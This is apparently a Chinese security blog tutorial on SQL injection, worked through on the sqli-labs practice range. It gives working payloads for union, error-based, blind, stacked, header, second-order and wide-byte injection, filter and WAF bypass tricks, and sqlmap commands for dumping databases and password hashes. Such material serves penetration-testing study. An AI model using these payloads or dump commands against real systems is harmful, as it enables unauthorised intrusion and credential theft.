【Web安全】SQL各类注入与绕过

【Web安全】SQL各类注入与绕过

【Web安全靶场】sqli-labs-master 1-20 BASIC-Injection

【Web安全靶场】sqli-labs-master 21-37 Advanced-Injection

【Web安全靶场】sqli-labs-master 38-53 Stacked-Injections

【Web安全靶场】sqli-labs-master 54-65 Challenges 与62关二分法和like模糊搜索

这一篇博客我会对待我的笔记和教程一样写，也就是会细也会不细。

文章目录

• 【Web安全】SQL各类注入与绕过
• • [1. 什么是SQL？](#1. 什么是SQL？)
  • [2. SQL注入简介](#2. SQL注入简介)
  • [3. 判断闭合](#3. 判断闭合)
  • [4. 判断数字型还是字符型](#4. 判断数字型还是字符型)
  • [4. 联合查询注入](#4. 联合查询注入)
  • [5. 报错注入](#5. 报错注入)
  • [6. 堆叠注入](#6. 堆叠注入)
  • [7. 布尔盲注与时间盲注](#7. 布尔盲注与时间盲注)
  • [8. 以上内容常用函数](#8. 以上内容常用函数)
  • [9. HTTP头部注入](#9. HTTP头部注入)
  • [10. 二次注入](#10. 二次注入)
  • [11. 宽字节注入](#11. 宽字节注入)
  • [12. 双查询注入（报错注入一种）](#12. 双查询注入（报错注入一种）)
  • [13. SQL注入过滤与绕过](#13. SQL注入过滤与绕过)
  • • [13.1. 双写绕过、大小写绕过](#13.1. 双写绕过、大小写绕过)
    • [13.2. 内联注释绕过](#13.2. 内联注释绕过)
    • [13.3. 逻辑符号绕过](#13.3. 逻辑符号绕过)
    • [13.4. 绕过空格过滤](#13.4. 绕过空格过滤)
    • [13.5. 引号添加反斜杠过滤绕过](#13.5. 引号添加反斜杠过滤绕过)
    • [13.6. 大于小于号过滤绕过](#13.6. 大于小于号过滤绕过)
    • [13.7. 等号过滤绕过](#13.7. 等号过滤绕过)
    • [13.8. 逗号过滤绕过](#13.8. 逗号过滤绕过)
    • [13.9. 关键函数](#13.9. 关键函数)
  • [14. SQLmap](#14. SQLmap)
  • • [1. 目标](#1. 目标)
    • [2. 脱库](#2. 脱库)
    • • [2.1. 脱库（补充）](#2.1. 脱库（补充）)
    • [3. 其他](#3. 其他)
    • • [3.1. 其他（补充）](#3.1. 其他（补充）)
    • [4. 绕过脚本tamper](#4. 绕过脚本tamper)

1. 什么是SQL？

SQL结构化查询语言用于管理关系型数据库管理系统，SQL的范围包括数据插入、查询、更新和删除，数据库模式创建和修改，以及数据访问控制。所谓关系型数据库，就像一张表，一个数据库中有很多的表，每一张表可以存储不同的内容。在一张表中，有列名也就是每一列的属性名称，如姓名、地址等，我们选取数据时，只需要知道数据库名、表名、列名以及条件，即可选取想要的数据。在开始SQL注入之前，需要简单了解一下SQL的基本语法，可见菜鸟教程及其他博客，这里就不占用篇幅了。

菜鸟教程-SQL，怎么学习呢？其实只要理解如何简单地选择，插入，修改和删除等以及常用的关键字，ORDER BY、AND、OR、UNION、WHERE等、注释方式，limit，substr函数。

2. SQL注入简介

SQL注入是一种代码注入技术，用于攻击数据驱动的应用程序。在应用程序中，如果没有恰当的过滤，则可能使得恶意的输入导致服务器代码查询语句被恶意拼接，进一步使得数据库信息泄露。

先来举出SQL注入类型吧，常见的SQL注入类型有：联合注入、报错注入、堆叠注入、时间盲注、布尔盲注、二次注入、宽字节注入、XFF注入等。

3. 判断闭合

例如有下面几段SQL语句：

select * from security where x=$id;
select * from security where x=($id);
select * from security where x='$id';
select * from security where x=('$id');
select * from security where x=(('$id'));
select * from security where x="$id";
select * from security where x=("$id");
select * from security where x=(("$id"));

这几条是不同闭合方式的SQL语句，第一条是数字型注入，剩下的是字符型注入，它们都有不同的闭合方式------单引号闭合、单引号括号闭合等。$id是我们输入的值，我们输入id=1 的话，第一条语句就为select * from security where x=1;，假如输入id=1"多了个单引号（以第一条和第六条为例），那么第一条语句就会报错，第六条也会报错因为多了个双引号；如果我们输入id=1" -- #呢？第一条还是会报错，但是第六条不会报错，因为我们最后的SQL语句是select * from security where x="1" -- #";后面的一个双引号被注释掉了，这就是构造闭合。

4. 判断数字型还是字符型

?id=2-1 --+ 确定2和1的内容如果通过减号显示1的内容，那就是数字型输入。有时候这一杠会被过滤就换一种方法
?id=1' --+出现报错信息，根据报错信息可以判断原来有没有引号

?id=1' and '1'='1
?id=2' and '1'='1  判断有没有括号，因为有括号的话整体是1
剩下就是一些加单引号、双引号、括号、大括号，百分号的过程了，大括号和百分号比较少见。

刷sql-labs-master靶场习惯了就容易判断了。

闭合完成之后可以干嘛？当然是构造payload，例如（先不管它是做什么的）：

select * from database where id='1' and updatexml(1,concat('~',substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+'

其中我们输入的内容是：1' and updatexml(1,concat('~',substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+

总之，url后面是字符，那么可能就是字符型注入，url后面是数字，可能是字符型也可能是数字型，这需要测试。

4. 联合查询注入

联合查询的原理是利用了数据库的联合操作，将两个或多个查询的结果合并到一个结果集中。当注入成功时，原始查询和额外的查询的结果会合并在一起返回给应用程序，进而显示在页面上。

判断完闭合之后就是构造payload了，具体步骤就是获取表名、列名和数据，而这一节讲的联合查询的具体步骤就是：

• 判断有多少列，使用order by，这个关键字的作用是根据某一列进行排序，假设只有三列，你想要根据第四列排序，但是没有第四列呀！这就会报错或者说是不显示数据。

  ?id=1' order by 3 -- #

• 判断回显位union select，回显位是啥？查询操作将两个或多个查询的结果合并到一个结果集中。当注入成功时，原始查询和额外的查询的结果会合并在一起返回给应用程序，进而显示在页面上。当然要是的前者返回为空才会显示第二个查询的数据。之后页面会显示会显示是哪一个，进而在那一个数进行操作即可。

  ?id=-1' union select 1,2,3 -- #

• 获取表名，为什么不先获取数据名呢？因为可以使用database()函数代替：

  ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- #

group_concat()函数是将里面的多个行整合为一行即一个字符串，information_schema见这里，简单看一下column_name、table_name、table_schema对选取条件有帮助的就行。

• 获取列名

  ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'-- #

• 获取数据

  ?id=-1' union select 1,group_concat(username,0x3a,password),3 from users -- #

5. 报错注入

报错注入的定义就是利用了数据库的某一些机制，人为制造错误的条件，并且将查询结果附在报错信息之中，前提是有报错信息，查询php代码可知通常是print_r(mysql_error())。常见的报错函数有：floor、updatexml、extractvalue等。

• updatexml语法：三个参数，第一个string格式为XML对象的名称内容，第二个是Xpath格式，xpath差不多就是一个位置，第三个参数为更新的内容，如果第二个参数不是xpath格式则会报错。

• extractvalue语法：两个参数，第一个是string格式为xml文档对象的名称，第二个是xpath格式，报错原理也一样。

来看sqli-labs-master第一关，确定好闭合方式之后：

• 获取表名：

  ?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

• 获取列名：

  ?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database())),3) --+

• 获取数据

  ?id=1' and updatexml(1,concat('~',substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+

其中concat()函数为连接函数，连接波浪号和查询信息，波浪号常常使用0x7e代替，substr为截取函数，因为报错信息最多32位，或者使用limit分页函数。

6. 堆叠注入

堆叠注入的原理是利用了SQL查询语句中分号（;）的特性以及数据库执行多条SQL语句的能力。攻击者可以在注入点插入一个分号，然后在分号后面添加额外的SQL语句，使得数据库在执行查询时，会依次执行多条SQL语句。

以下是一个堆叠注入的简单例子，假设有一个登录页面，用户可以输入用户名和密码登录：

SELECT * FROM users WHERE username='$username' AND password='$password'

攻击者可以尝试在用户名和密码字段中进行注入，假设用户名字段存在注入漏洞。攻击者可以输入以下内容作为用户名：

' OR 1=1; INSERT INTO log (event) VALUES ('Successful login');

这个输入将会导致以下SQL语句被执行：

SELECT * FROM users WHERE username='' OR 1=1; INSERT INTO log (event) VALUES ('Successful login') AND password='$password'

这里的分号后面的部分是一个额外的SQL语句，它会被数据库执行，插入一条日志记录，表示成功登录，同时也可以修改别人的密码等操作，反正啥都行。

7. 布尔盲注与时间盲注

布尔盲注是一种利用布尔逻辑（即真和假）来推断数据库中数据的SQL注入技术。它通常用于无法直接获取数据的情况下，但可以通过不同的查询结果来推断出数据的存在与否，以及数据的属性。布尔盲注通过在SQL查询中插入条件语句来测试特定条件的真假，从而逐步推断出数据库中的信息。在进行练习时候，如果一个界面只有成功显示不成功显示、登录成功失败，没有报错没有回显时考虑，并且使用时候搭配burpsuite的intruder模块根据返回内容长度判断。

• 攻击者通过注入点插入条件语句，例如：?id=1') and if(substr(database(),1,1)='c',1,0) -- #

• 根据返回结果（真或假），攻击者可以推断出密码的第一个字符是否为 'c'。如果返回真，表示密码的第一个字符是 'c'；如果返回假，表示密码的第一个字符不是 'c'。

• 通过不断更改条件语句中的参数，并观察返回结果，攻击者可以逐个字符地推断出密码的值。

爆表名：

?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+

---

时间盲注是一种根据访问时间来推断数据库中数据的注入技术，它通常用于无法直接获取数据的情况下，并且无论参数对还是错界面都是一样的页面。比如说sqli-labs-master第九关：无论参数是否正确都显示You are in...，所以使用时间盲注。

常用的函数就是if()，第一个参数就是表达式，第二个第三个参数就是要执行的语句，如果表达式正确如下就会执行sleep(2)，而sleep()是延时函数，单位是秒。

?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(2),1) --+

8. 以上内容常用函数

substr(str,start,length)截取函数
第一个参数str为被截取的字符串，第二个参数start为开始截取的位置，第三个参数length为截取的长度。

left(str,length)截取函数，从左到右
第一个参数str为被截取的字符串。
第二个参数length为截取的长度。

right(str,legnth)截取函数，从右到左
第一个参数str为被截取的字符串。
第二个参数length为截取的长度。

ascii(char)转化为十进制的ascii码

length(str)返回长度

ord(char)ascii转换函数

if(cond，ture_result，False_result)比较函数
第一个表达式正确返回第二个，错误则返回第三个

9. HTTP头部注入

请求头	含义和作用	示例
Accept	告知服务器客户端能够接受的响应内容类型。	Accept: text/html, application/json
Accept-Language	告知服务器客户端可接受的语言类型。	Accept-Language: en-US, zh-CN;q=0.9
Accept-Encoding	告知服务器客户端可接受的内容编码方式，用于数据压缩传输。	Accept-Encoding: gzip, deflate
Host	指定请求的目标服务器的域名或IP地址和端口号。	Host: www.example.com:8080
Cookie	在HTTP请求中携带存储在客户端的Cookie信息，用于会话状态保持。例如，输入用户名和密码登录一个网站后，每次刷新和请求该站点其他页面，都会保持登录状态，这就是Cookie的功劳。	Cookie: session_id=123456; user_id=987654
Referer	表示当前请求的来源页面的URL，用于跟踪和统计。	Referer: https://www.example.com/page1
User-Agent	标识客户端应用程序或浏览器的信息，帮助服务器优化响应。	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type	指定请求体中的数据类型，用于POST请求等需要传递数据的请求。Content-Type的设置对于数据的正确解析和处理非常重要。例如，如果服务器期望接收JSON数据，而客户端却发送了普通文本数据，服务器可能无法正确解析数据。	Content-Type: application/json; charset=utf-8

大部分请求头都有可能存在注入，因为后端代码也会根据请求头查询数据。样例见，sqli-labs-master第18、19、20、21、22。

10. 二次注入

二次注入也称为存储型注入，就是将可能触发sql注入的字符存在数据库中，当再次调用这个恶意构造的字符就可以触发二次注入。

这里以sqli-labs-master第24关为例子。

• 代码一：实现了简单的用户注册功能，程序获取到GET参数username和参数password，然后将username和password拼接到SQL语句，使用insert语句插入数据库中。由于参数username使用addslashes进行转义（转义了单引号，导致单引号无法闭合），参数password进行了MD5哈希，所以此处不存在SQL注入漏洞。正常插入test'之后，数据库就有了test'这个用户。

• 当访问username=test'&password=123456时，执行的SQL语句为：

  insert into users（`username`,`password`）values （'test'','e10adc3949ba59abbe56e057f20f883e'）。

<?php
$con=mysqli_connect("localhost", "root", "root", "sql");

if (mysqli_connect_errno()) {
   echo "数据库连接错误: " . mysqli_connect_error();
}
$username = $_GET['username'];
$password = $_GET['password'];
$result = mysqli_query($con, "insert into users(`username`, `password`) values ('".addslashes($username)."','".md5($password)."')");
echo "新 id 为: " . mysqli_insert_id($con);
?>

• 代码二：在二次注入中，第二段中的代码如下所示，首先将GET参数ID转成int类型（防止拼接到SQL语句时，存在SQL注入漏洞），然后到users表中获取ID对应的username，接着到person表中查询username对应的数据。但是此处没有对$username进行转义，在第一步中我们注册的用户名是test'，此时执行的SQL语句为：

  select * from person where username='test''

单引号被带入SQL语句中，由于多了一个单引号，所以页面会报错。

回到24题发现有很多代码。

• 分析login.php代码发现对于username和password使用了mysql_real_escape_string函数，这个函数会对单引号（'）、双引号（"）、反斜杠（\）、NULL 字符等加添反斜杠来进行转义，所以在登录界面框无法直接下手。

$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);

• 接着分析创建新用户的代码，在new_user.php中有form表单提交到login_create.php中，所以重点还是login_create.php，发现还是存在转义：

$username=  mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

• 那就登录进去看一下，登录进去是一个修改密码的框，其中不需要填写账号密码，看一下代码：

$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

可以发现漏洞存在于此处，这一道题不是获取数据库而是获取admin的密码，所以我们可以构造一个admin'#的账号，虽然在注册部分单引号会被转义但数据库中并不会存在这个反斜杠，注册账号admin'#密码随便，于是就可以登录进去，然后再修改密码，其中的sql语句为：

$sql = "UPDATE users SET PASSWORD='你想要的密码' where username='admin'#' and password='$curr_pass' ";

于是修改admin账号不需要原始密码。

11. 宽字节注入

宽字节注入指的是mysql数据库在使用GBK编码时（一般账号啥的能输入或显示中文的就是了），会认为两个字符是一个汉字，而且当我们输入单引号时，mysql会调用转义函数，将单引号变为'，其中\的十六进制是%5c,mysql的GBK编码会认为%df%5c是一个宽字节，也就是"運'，从而使单引号闭合(逃逸)，进行注入攻击

这里以sqli-labs-master第三十二关为例：

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
    return $string;
}

function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

对于第一段代码，单引号、双引号和反斜杠都加上了一个反斜杠，我们试一下输入中文：

输入中文发现回显的是中文为gbk编码，所以我们可以使用宽字节注入，原理就是%df和反斜杠可以组成一个中文字符

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #

12. 双查询注入（报错注入一种）

首先这适合其他报错函数都过滤了但有报错信息，而且没有回显位的，比较少见所以这里给出链接。

[【Double SQL Injection(双查询注入) | Mochazz's blog】](https://mochazz.github.io/2017/09/23/Double_ SQL_Injection/)。

这里以sqli-labs-master第五关为例子。

首先这对于初学来说这个报错注入会比较难理解，我们先判断闭合方式：

?id=1' and '1'='1
?id=1' and '1'='2

通过上述语句可以知道这是单引号闭合，接下来判断注入类型，这里先试一下Union注入：

?id=1' order by 3 --+
?id=1' order by 4 --+

通过上述语句可以得到字段数为3，接下来判断回显位：

?id=1' and '1'='2' union select 1,2,3--+

通过这一段payload，发现并没有回显位，所以Union注入不可行，所以回到报错注入。

?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)--+

通过上述语句得到的结果为 XPATH syntax error: '~emails,referers,uagents,users'，之后过程省略。但是这一关的考点为报错注入中的双查询注入，我们假设updatexml()被过滤了，我们要使用双查询注入，关于双查询注入的文章[【Double SQL Injection(双查询注入) | Mochazz's blog】](https://mochazz.github.io/2017/09/23/Double_ SQL_Injection/)。

?id=1' union select 1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a --+

通过上述语句得到Duplicate entry ':emails,referers,uagents,users:0' for key ''，接着获取users的字段名

?id=1' union select 1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a --+

通过上述语句得到 **Duplicate entry ':id,username,password:0' for key ''**接着获取username和password：

?id=1' union select 1,concat(0x3a,(select concat(username,0x3a,password) from users limit 0,1),0x3a,floor(rand()*2)) as a,count(*) from information_schema.columns group by a --+

13. SQL注入过滤与绕过

13.1. 双写绕过、大小写绕过

对于sqli-Less25关有对于and和or大小写不敏感的过滤，这里的i表示大小写不敏感：

$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

我们可以使用双写绕过，对于其他select过滤等也可试一试：

oorr
anandd
selSElectect

SElect

13.2. 内联注释绕过

SEL/**/ECT。在SELECT中间加入内联注释，可能绕过对SELECT关键词的检查

注意是可能！像sqli 26关就有对内联注释的过滤

13.3. 逻辑符号绕过

对于and、or、xor、not的黑名单绕过，可以使用逻辑符号，最好使用||

or = ||
and = &&
xor = | 或者 ^
not = !

注：有些题使用&&不行，使用||却可以，不知道为啥。

13.4. 绕过空格过滤

/**/

() 例如：?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=database()))) ,1) || '1'='1

//下面编码貌似在windows phpstudy环境下无效
%09 TAB 键（水平）
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键（垂直）
%a0 空

`(tap键上面的按钮)

+ 加号

两个空格

注：1'%0aanandd%0a'1'=2 不可以验证%0a有用，这里有没有都可以。

13.5. 引号添加反斜杠过滤绕过

%df宽字节注入

CHAR()函数，例如：table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121)  最常用

转化成Hex编码：table_schema=0x7365637572697479  （security）注意不用转引号

常见的php过滤函数mysql_real_escape_string、addslashes()

13.6. 大于小于号过滤绕过

大于小于号常见在盲注，可以使用between左闭右开，in关键字，greatest函数和least函数返回最值

where id=1 and greatest(ascii(substr(database(),1,1)),1)=99;
where id=1 and substr(database(),1,1) in ('c');
where id=1 and substr(database(),1,1) between 'a' and 'd';

13.7. 等号过滤绕过

如果等号被过滤，可以使用:

>0 and <2 等价于 =1
<>等价于!
like
正则匹配

13.8. 逗号过滤绕过

我们可能会使用substr()，substring()，mid()等函数，里面会有逗号

• 对于substr()和mid()这两个方法可以使用from for 的方式来解决

  select substr(database() from 1 for 1)='c';

• join关键字

  union select 1,2,3,4;
  union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
  union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

13.9. 关键函数

sleep() -->benchmark() 指定次数表达式，造成延迟
使用 HEX('A') 或 BIN('A') 替代 ASCII('A')。
SELECT group_concat('str1','str2');->SELECT concat_ws(',', 'str1', 'str2');
使用SELECT @@user; 替代SELECT user();
ord()->ascii()
SELECT IF(substr(database(),1,1)='c',1,0);->SELECT IFNULL(substr(database(),1,1)='c',0); 或 SELECT CASE substr(database(),1,1)='c' WHEN 1 THEN 1 ELSE 0 END;

14. SQLmap

1. 目标

操作	作用	必要示例
-u	指定URL，检测注入点	sqlmap -u 'http://example.com/?id=1'
-m	指定txt，里面有很多个URL	sqlmap -m urls.txt
-r	检测POST请求的注入点，使用BP等工具抓包，将http请求内容保存到txt文件中，接着-p指定参数	sqlmap -r request.txt
--cookie	指定cookie的值，单/双引号包裹	sqlmap -u "http://example.com?id=x" --cookie 'session_id=1234'
-D	指定数据库	sqlmap -u 'http://example.com/?id=1' -D mydatabase
-T	指定表	sqlmap -u 'http://example.com/?id=1' -D mydatabase -T mytable
-C	指定字段	sqlmap -u 'http://example.com/?id=1' -D mydatabase -T mytable -C mycolumn

2. 脱库

操作	作用	必要示例
-b	获取数据库版本	sqlmap -u <url> -b
--current-db	当前数据库	sqlmap -u <url> --current-db
--dbs	获取数据库	sqlmap -u <url> --dbs
--tables	获取表	sqlmap -u <url> --tables -D <database>
--columns	获取字段	sqlmap -u <url> --columns -D <database> -T <table>
--schema	字段类型	sqlmap -u <url> --schema -D <database>
--dump	获取数据	sqlmap -u <url> --dump -D <database> -T <table>
--start	开始的行	sqlmap -u <url> --start=1 -D <database> -T <table>
--stop	结束的行	sqlmap -u <url> --stop=10 -D <database> -T <table>
--search	搜索库表字段	sqlmap -u <url> --search -C <column>
--tamper	WAF绕过	sqlmap -u <url> --tamper=<tamper_script>

2.1. 脱库（补充）

• --current-db获取的是当前的数据库名称，而--dbs获取的是所有的数据库名称
• WAF 指的是"Web Application Firewall"，即网络应用防火墙，例如sqlmap -u 'http://xx/?id=1' --tamper 'space2comment.py'，sqlmap有很多内置的绕过脚本(脚本按照用途命名)，在/usr/share/sqlmap/tamper/目录下
• --search：如果你正在寻找包含特定关键字的列，这个命令将列出所有包含该关键字的列的名称及其所属的表和数据库。

3. 其他

操作	作用	必要示例
--batch	不再询问确认	sqlmap -u 'http://example.com/?id=1' --batch
--method=GET	指定请求方式	sqlmap -u 'http://example.com/?id=1' --method=GET
--random-agent	随机UA	sqlmap -u 'http://example.com/?id=1' --random-agent
--user-agent	自定义UA	sqlmap -u 'http://example.com/?id=1' --user-agent 'MyUserAgent'
--referer	自定义referer	sqlmap -u 'http://example.com/?id=1' --referer 'http://referer.com'
--proxy="123"	代理	sqlmap -u 'http://example.com/?id=1' --proxy='http://123.123.123.123:8080'
--threads 10	线程数1~10	sqlmap -u 'http://example.com/?id=1' --threads 10
--level=1	测试等级1~5	sqlmap -u 'http://example.com/?id=1' --level=1
--risk=1	风险等级0~3	sqlmap -u 'http://example.com/?id=1' --risk=1

3.1. 其他（补充）

• 测试等级：这个等级决定了 SQLMap 将尝试的测试数量和类型。较高的等级意味着 SQLMap 将执行更多类型的测试，这些测试可能更复杂，有时也更具侵入性。例如，在较低的等级上，SQLMap 可能只测试最常见的注入类型，而在较高等级上，它会尝试更多不常见的或复杂的注入技术。
• 风险等级：风险等级影响测试的侵入性。较高的风险等级可能会运行更具侵入性的测试，这些测试可能会对数据库造成更大的负担或风险。例如，一些高风险测试可能包括执行实际的数据库操作（如更新或删除数据），而低风险测试则尽量避免这种潜在的破坏性操作。

操作	作用	必要示例
-a	自动识别和测试所有参数	sqlmap -u 'http://example.com/?id=1' -a
--current-user	获取当前数据库用户	sqlmap -u 'http://example.com/?id=1' --current-user
--is-dbs	是不是数据库管理员	sqlmap -u 'http://example.com/?id=1' --is-dbs
--users	枚举数据库服务器上的用户	sqlmap -u 'http://example.com/?id=1' --users
--privileges	枚举数据库用户的权限	sqlmap -u 'http://example.com/?id=1' --privileges
--passwords	尝试获取数据库用户的密码	sqlmap -u 'http://example.com/?id=1' --passwords
--hostname	获取数据库服务器的主机名	sqlmap -u 'http://example.com/?id=1' --hostname
--statements	捕获并显示SQL语句	sqlmap -u 'http://example.com/?id=1' --statements

4. 绕过脚本tamper

sqlmap在默认情况下除了使用CHAR()函数防止出现单引号，没有对注入的数据进行修改，我们还可以使用--tamper参数对数据进行修改来绕过WAF等设备，这里就不放置脚本名字了直接上网搜就行了，sqlmap内置53个脚本。

sqlmap XXXXX --tamper "模块名"